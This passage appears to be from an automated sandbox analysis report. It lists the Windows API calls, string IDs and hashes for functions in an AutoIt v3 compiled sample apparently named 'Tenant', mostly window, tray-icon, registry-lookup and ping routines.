                                                                                        • API String ID: 2914291525-1005189915
                                                                                        • Opcode ID: 22b055bd04f5d81e04bf6ae77786015772354a429c6a6ce8e62131e12d717d97
                                                                                        • Instruction ID: 664984c332b4f0bb2b84e14d4035618851a599c1b49ff09a5483720dc146e7da
                                                                                        • Opcode Fuzzy Hash: 22b055bd04f5d81e04bf6ae77786015772354a429c6a6ce8e62131e12d717d97
                                                                                        • Instruction Fuzzy Hash: 56310771854309EFDB419FA4D899BDDBBF4FF09314F20425AE590A72A0DBB91981CF90
                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00AA3444
                                                                                        • RegisterClassExW.USER32(00000030), ref: 00AA346E
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA347F
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00AA349C
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA34AC
                                                                                        • LoadIconW.USER32(000000A9), ref: 00AA34C2
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA34D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-1005189915
                                                                                        • Opcode ID: 3214061b8bc102a8786cdf900dafc8276c0ebd58b51f35642c09cbd49a8b0f7a
                                                                                        • Instruction ID: 62f96cee969b71b843e4ab3852211f265fa0456b40da9cf1497ab4a31eadcda8
                                                                                        • Opcode Fuzzy Hash: 3214061b8bc102a8786cdf900dafc8276c0ebd58b51f35642c09cbd49a8b0f7a
                                                                                        • Instruction Fuzzy Hash: 3421E3B1964209AFEB00EFA5EC98B9DBBF4FB08704F10411AF510A72A0DBB55944CF91
                                                                                        APIs
                                                                                          • Part of subcall function 00AC00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00AB3094), ref: 00AC00ED
                                                                                          • Part of subcall function 00AC08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00AB309F), ref: 00AC08E3
                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AB30E2
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00AF01BA
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00AF01FB
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AF0239
                                                                                        • _wcscat.LIBCMT ref: 00AF0292
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                        • API String ID: 2673923337-2727554177
                                                                                        • Opcode ID: a65501b8d72b2ff2661311287f55434eea25e2760ab3ab32430da553fefb230f
                                                                                        • Instruction ID: e71fac5c3326b46f53a263de732b3b9f3692917d9697c111fc765ad1164f59de
                                                                                        • Opcode Fuzzy Hash: a65501b8d72b2ff2661311287f55434eea25e2760ab3ab32430da553fefb230f
                                                                                        • Instruction Fuzzy Hash: C0717C714093059EC714EF65E9A5DABBBE8FF49340F80062EF545831B2EF749948CBA2
                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00AB5156
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00AB5165
                                                                                        • LoadIconW.USER32(00000063), ref: 00AB517C
                                                                                        • LoadIconW.USER32(000000A4), ref: 00AB518E
                                                                                        • LoadIconW.USER32(000000A2), ref: 00AB51A0
                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AB51C6
                                                                                        • RegisterClassExW.USER32(?), ref: 00AB521C
                                                                                          • Part of subcall function 00AA3411: GetSysColorBrush.USER32(0000000F), ref: 00AA3444
                                                                                          • Part of subcall function 00AA3411: RegisterClassExW.USER32(00000030), ref: 00AA346E
                                                                                          • Part of subcall function 00AA3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA347F
                                                                                          • Part of subcall function 00AA3411: InitCommonControlsEx.COMCTL32(?), ref: 00AA349C
                                                                                          • Part of subcall function 00AA3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA34AC
                                                                                          • Part of subcall function 00AA3411: LoadIconW.USER32(000000A9), ref: 00AA34C2
                                                                                          • Part of subcall function 00AA3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA34D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                        • String ID: #$0$AutoIt v3
                                                                                        • API String ID: 423443420-4155596026
                                                                                        • Opcode ID: c00b1ad850ecaea4b17cd0e0deeb984380100a550c206ca0fe2f0a9a22bfdc97
                                                                                        • Instruction ID: ece1c338c941392bcdd6fcc5bf95cb1b38b61e4c731e68e894cf7d813c38c560
                                                                                        • Opcode Fuzzy Hash: c00b1ad850ecaea4b17cd0e0deeb984380100a550c206ca0fe2f0a9a22bfdc97
                                                                                        • Instruction Fuzzy Hash: FA213771D94308ABEB109FA4ED29B9D7BB4FB09718F10015AF604A72E1DFFA59508F84
                                                                                        APIs
                                                                                        • WSAStartup.WS2_32(00000101,?), ref: 00B15E7E
                                                                                        • inet_addr.WSOCK32(?,?,?), ref: 00B15EC3
                                                                                        • gethostbyname.WS2_32(?), ref: 00B15ECF
                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00B15EDD
                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B15F4D
                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B15F63
                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B15FD8
                                                                                        • WSACleanup.WSOCK32 ref: 00B15FDE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                        • String ID: Ping
                                                                                        • API String ID: 1028309954-2246546115
                                                                                        • Opcode ID: 807a621d53ef80b97e514dd93b7ad8c92121d9fdac2f50001617b333415b0eda
                                                                                        • Instruction ID: aec489c203163396df0c64f7dd71662f9c6272475ccf2d1859fcf6daf069085d
                                                                                        • Opcode Fuzzy Hash: 807a621d53ef80b97e514dd93b7ad8c92121d9fdac2f50001617b333415b0eda
                                                                                        • Instruction Fuzzy Hash: 1D514931604601DFD720AF24CD89BAEB7E4EF88710F1449A9F995DB2A1DB70E985CB42
                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00AB4E22
                                                                                        • KillTimer.USER32(?,00000001), ref: 00AB4E4C
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AB4E6F
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AB4E7A
                                                                                        • CreatePopupMenu.USER32 ref: 00AB4E8E
                                                                                        • PostQuitMessage.USER32(00000000), ref: 00AB4EAF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                        • String ID: TaskbarCreated
                                                                                        • API String ID: 129472671-2362178303
                                                                                        • Opcode ID: 6bd58de6c753f99164ccc045ef5525e9c03f95a8c9d60df093f0f7fe3fcc4e16
                                                                                        • Instruction ID: 1e24a33cfe26910c2b97e3da19c29fe0e5ec83bf7e458edb22eda549ba8b55f4
                                                                                        • Opcode Fuzzy Hash: 6bd58de6c753f99164ccc045ef5525e9c03f95a8c9d60df093f0f7fe3fcc4e16
                                                                                        • Instruction Fuzzy Hash: 9A41273125820AABEB256F689C5DBFE36ADFB49300F100115F601932E3DFB9DC109761
                                                                                        APIs
                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00AF0C5B
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                        • _memset.LIBCMT ref: 00AB5787
                                                                                        • _wcscpy.LIBCMT ref: 00AB57DB
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AB57EB
                                                                                        • __swprintf.LIBCMT ref: 00AF0CD1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                                        • String ID: Line %d: $AutoIt - $
                                                                                        • API String ID: 230667853-1796863236
                                                                                        • Opcode ID: 98b2bad0aa554a3b8455ea67b8a10c40bf7ed755b5a711db93d6033318254c8e
                                                                                        • Instruction ID: ea068c8ff9c26e0fcb618bb967b23c95d8bafabe21168b385a046fe64cc3978d
                                                                                        • Opcode Fuzzy Hash: 98b2bad0aa554a3b8455ea67b8a10c40bf7ed755b5a711db93d6033318254c8e
                                                                                        • Instruction Fuzzy Hash: E041B071508304AAD321EB60DDA5FEF77ECAF45354F500A1EF185920A3EF74A649CB92
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AB5109
                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AB512A
                                                                                        • ShowWindow.USER32(00000000), ref: 00AB513E
                                                                                        • ShowWindow.USER32(00000000), ref: 00AB5147
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateShow
                                                                                        • String ID: AutoIt v3$edit
                                                                                        • API String ID: 1584632944-3779509399
                                                                                        • Opcode ID: a4b891ccd5c5ec262f5fcaa97b088ceff1781639cde8390e04f541d1c2e4408e
                                                                                        • Instruction ID: 2fdeb9fe4b48e853941f35d7e29de9eac4fde6663c6193996ff605eec615dfe2
                                                                                        • Opcode Fuzzy Hash: a4b891ccd5c5ec262f5fcaa97b088ceff1781639cde8390e04f541d1c2e4408e
                                                                                        • Instruction Fuzzy Hash: 8CF0DA71595294BEEA312B276C69E273E7DDBC7F54F11011AF900A31B0CEA91851DEB0
                                                                                        APIs
                                                                                          • Part of subcall function 00AB4A8C: _fseek.LIBCMT ref: 00AB4AA4
                                                                                          • Part of subcall function 00B09CF1: _wcscmp.LIBCMT ref: 00B09DE1
                                                                                          • Part of subcall function 00B09CF1: _wcscmp.LIBCMT ref: 00B09DF4
                                                                                        • _free.LIBCMT ref: 00B09C5F
                                                                                        • _free.LIBCMT ref: 00B09C66
                                                                                        • _free.LIBCMT ref: 00B09CD1
                                                                                          • Part of subcall function 00AC2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00AC9C54,00000000,00AC8D5D,00AC59C3), ref: 00AC2F99
                                                                                          • Part of subcall function 00AC2F85: GetLastError.KERNEL32(00000000,?,00AC9C54,00000000,00AC8D5D,00AC59C3), ref: 00AC2FAB
                                                                                        • _free.LIBCMT ref: 00B09CD9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                        • API String ID: 1552873950-2806939583
                                                                                        • Opcode ID: aa1f1db790cc32ffd54d6d1240d15be1fa8de7641d75afd7b47c38ce8d3984c7
                                                                                        • Instruction ID: 15e0ecca24aec2cf5294578676532a1db2aa4cd3dda35516ab2ddf9e8a75cea7
                                                                                        • Opcode Fuzzy Hash: aa1f1db790cc32ffd54d6d1240d15be1fa8de7641d75afd7b47c38ce8d3984c7
                                                                                        • Instruction Fuzzy Hash: 8B512EB1D04219ABDF249F64DC41A9EBBB9FF48304F00049EF649A3282DB715A908F59
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 1559183368-0
                                                                                        • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                        • Instruction ID: 07930c3b456502add2cbaa88f67ba6b7b7239657cdb370d0cefa6105a4742283
                                                                                        • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                        • Instruction Fuzzy Hash: 62517F31E00B05DBDB249FB98980F6E77B5AF51360F6A8B2DF825962D0D770ADD09B40
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AA52E6
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AA534A
                                                                                        • TranslateMessage.USER32(?), ref: 00AA5356
                                                                                        • DispatchMessageW.USER32(?), ref: 00AA5360
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Peek$DispatchTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 1795658109-0
                                                                                        • Opcode ID: d5e3757e46c0d8700bddb2a1de20c075c2159137e53d5e4b43c8a1f939ea41f8
                                                                                        • Instruction ID: 47f0cbe1c7fd86fc3129c6191ff79aeae8345c0e06eba64a639a4c1a2ef44901
                                                                                        • Opcode Fuzzy Hash: d5e3757e46c0d8700bddb2a1de20c075c2159137e53d5e4b43c8a1f939ea41f8
                                                                                        • Instruction Fuzzy Hash: FE31F630D447069BDF308B74DC54BF977F8AB56344F24005AE4129B1D1DBF59889D725
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00AA1275,SwapMouseButtons,00000004,?), ref: 00AA12A8
                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00AA1275,SwapMouseButtons,00000004,?), ref: 00AA12C9
                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00AA1275,SwapMouseButtons,00000004,?), ref: 00AA12EB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: Control Panel\Mouse
                                                                                        • API String ID: 3677997916-824357125
                                                                                        • Opcode ID: 8defe200836875a8bb12a1a041660142bc7259b90f11b0271cd1f48274819ac4
                                                                                        • Instruction ID: 21964621cd86812669d9818346db3a445ed578adee61f271428512f13e10c80b
                                                                                        • Opcode Fuzzy Hash: 8defe200836875a8bb12a1a041660142bc7259b90f11b0271cd1f48274819ac4
                                                                                        • Instruction Fuzzy Hash: B6115775610208BFDB208FA4DC84EEEBBBCEF06740F108569F805D7250E7319E449BA4
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00AB5B58
                                                                                          • Part of subcall function 00AB56F8: _memset.LIBCMT ref: 00AB5787
                                                                                          • Part of subcall function 00AB56F8: _wcscpy.LIBCMT ref: 00AB57DB
                                                                                          • Part of subcall function 00AB56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AB57EB
                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00AB5BAD
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AB5BBC
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AF0D7C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1378193009-0
                                                                                        • Opcode ID: 308a22a97309fe3114bf6d4f5c06a7d1ee625a1e75f7015f9e35e51218565dc4
                                                                                        • Instruction ID: d47afb36d617a305c76ad25df784ab2fbfaf2864617b427cfed99b46386bdcf1
                                                                                        • Opcode Fuzzy Hash: 308a22a97309fe3114bf6d4f5c06a7d1ee625a1e75f7015f9e35e51218565dc4
                                                                                        • Instruction Fuzzy Hash: 5C21A7709047889FEB729B748895FFABBECAF02308F04049DE79A57282D7746984DB51
                                                                                        APIs
                                                                                          • Part of subcall function 00AB49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00AB27AF,?,00000001), ref: 00AB49F4
                                                                                        • _free.LIBCMT ref: 00AEFB04
                                                                                        • _free.LIBCMT ref: 00AEFB4B
                                                                                          • Part of subcall function 00AB29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AB2ADF
                                                                                        Strings
                                                                                        • Bad directive syntax error, xrefs: 00AEFB33
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                        • String ID: Bad directive syntax error
                                                                                        • API String ID: 2861923089-2118420937
                                                                                        • Opcode ID: c75daf7808bceca452b66a9854439db663d7c2d0a68310b116a1687f10b5473f
                                                                                        • Instruction ID: dfd823987b93615242983d211c5911c4d0a250ed49ad8902d08761f1900e9a17
                                                                                        • Opcode Fuzzy Hash: c75daf7808bceca452b66a9854439db663d7c2d0a68310b116a1687f10b5473f
                                                                                        • Instruction Fuzzy Hash: 82918171910259AFCF04EFA5CD919EEB7B8FF09310F14457AF815AB2A2DB30AA05CB50
                                                                                        APIs
                                                                                          • Part of subcall function 00AB4AB2: __fread_nolock.LIBCMT ref: 00AB4AD0
                                                                                        • _wcscmp.LIBCMT ref: 00B09DE1
                                                                                        • _wcscmp.LIBCMT ref: 00B09DF4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                        • String ID: FILE
                                                                                        • API String ID: 4029003684-3121273764
                                                                                        • Opcode ID: 5f1c4a98c97b95ae730b6346df1b08585fba33dc0b3563db800586c0d2aa7eae
                                                                                        • Instruction ID: 256325bc0afcf1303ba240482d03717a538d84035f3f3a7c363fd789d5626198
                                                                                        • Opcode Fuzzy Hash: 5f1c4a98c97b95ae730b6346df1b08585fba33dc0b3563db800586c0d2aa7eae
